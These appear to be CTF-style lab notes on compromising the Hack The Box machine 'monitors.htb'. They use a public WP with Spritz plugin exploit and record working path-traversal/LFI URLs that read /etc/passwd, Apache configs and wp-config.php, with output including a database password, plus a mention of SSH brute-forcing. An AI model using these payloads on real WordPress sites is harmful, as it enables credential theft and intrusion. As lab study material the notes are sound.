4 wp with spritz exploit
Using https://www.exploit-db.com/exploits/44544
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
| also works http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
# LFI works, RFI is failing; .php file is viewed not running.
# cant figure out where is wp-config.php
| tried /var/www/html; /var/ww/; /var/www/html/monitors/ and lot of combinations
# reading apache config file to get more idea
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/apache2/apache2.conf
[truncated]
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
#<Directory /srv/>
# Options Indexes FollowSymLinks
# AllowOverride None
# Require all granted
#</Directory>
<FilesMatch "^\.ht">
Require all denied
</FilesMatch>
# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf
# reading vhost config file to get directory information
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/apache2/sites-available/000-default.conf
# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf
<VirtualHost *:80>
ServerAdmin admin@monitors.htb
DocumentRoot /var/www/html
Redirect 403 /
ErrorDocument 403 "Sorry, direct IP access is not allowed. <br><br>If you are having issues accessing the site then contact the website administrator: admin@monitors.htb"
UseCanonicalName Off
</VirtualHost>
# there is a new subdomain cacti-admin.monitors.htb
| added to /etc/hosts
# we know its /var/www/html bnut wp-config.php does not load
| tried php b64 wrapper, there's a directory whose name is not known
| using directory traversal to get config.php
# 3 directories back, makes sense
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpadmin' );
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
define( 'DB_HOST', 'localhost' );
# possible usernames
admin
wpadmin
marcus
# pass
BestAdministrator@2020!
# hydra ssh brute > nothing
# tried all creds on wp-login > nothing
# exploring new sub-domain
Last updated